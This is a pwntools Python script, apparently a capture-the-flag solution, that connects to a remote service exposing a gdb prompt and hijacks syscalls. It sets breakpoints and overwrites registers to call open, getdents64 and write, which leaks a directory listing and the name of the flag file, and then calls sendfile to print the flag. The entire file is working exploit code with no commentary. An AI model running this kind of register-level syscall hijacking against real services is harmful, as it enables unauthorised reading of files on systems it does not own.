from pwn import *
import re

libc = ELF("./libc.so.6") # taken from docker image
conn = remote("34.34.5.20", 1337)
#conn = process("./run.sh")

# use getdents to get file name
conn.sendlineafter(b"(gdb) ", b"break *$rcx+18446744073709510073")
conn.sendlineafter(b"(gdb) ", b"continue")
conn.sendlineafter(b"(gdb) ", b"continue")
conn.sendline(b".\0")
conn.sendlineafter(b"(gdb) ", b"continue")
conn.sendlineafter(b"(gdb) ", b"set $rax=2")
conn.sendlineafter(b"(gdb) ", b"set $rdi=$rsi")
conn.sendlineafter(b"(gdb) ", b"set $rsi=0")
conn.sendlineafter(b"(gdb) ", b"set $rdx=0")
conn.sendlineafter(b"(gdb) ", b"continue")
conn.sendlineafter(b"(gdb) ", b"continue")
conn.sendlineafter(b"(gdb) ", b"set $rax=217")
conn.sendlineafter(b"(gdb) ", b"set $rdi=3")
conn.sendlineafter(b"(gdb) ", b"set $rsi=$rsp")
conn.sendlineafter(b"(gdb) ", b"set $rdx=800")
conn.sendlineafter(b"(gdb) ", b"continue")
conn.sendlineafter(b"(gdb) ", b"continue")
conn.sendlineafter(b"(gdb) ", b"set $rax=1")
conn.sendlineafter(b"(gdb) ", b"set $rdi=1")
conn.sendlineafter(b"(gdb) ", b"set $rsi=$rsp")
conn.sendlineafter(b"(gdb) ", b"set $rdx=1000")
conn.sendlineafter(b"(gdb) ", b"continue")
fname = conn.recvuntil(b"txt")[-24:]
info("filename: " + str(fname))

conn.sendlineafter(b"(gdb) ", b"continue")
conn.sendlineafter(b"(gdb) ", b"continue")
conn.sendline(fname + b"\0")
conn.sendlineafter(b"(gdb) ", b"continue")
conn.sendlineafter(b"(gdb) ", b"set $rax=2")
conn.sendlineafter(b"(gdb) ", b"set $rdi=$rsi")
conn.sendlineafter(b"(gdb) ", b"set $rsi=0")
conn.sendlineafter(b"(gdb) ", b"set $rdx=0")
conn.sendlineafter(b"(gdb) ", b"continue")
conn.sendlineafter(b"(gdb) ", b"continue")
conn.sendlineafter(b"(gdb) ", b"set $rax=40")
conn.sendlineafter(b"(gdb) ", b"set $rdi=1")
conn.sendlineafter(b"(gdb) ", b"set $rsi=4")
conn.sendlineafter(b"(gdb) ", b"set $rdx=0")
conn.sendlineafter(b"(gdb) ", b"set $r10=500")
conn.sendlineafter(b"(gdb) ", b"continue")
info("flag: " + str(conn.recvline().strip()))
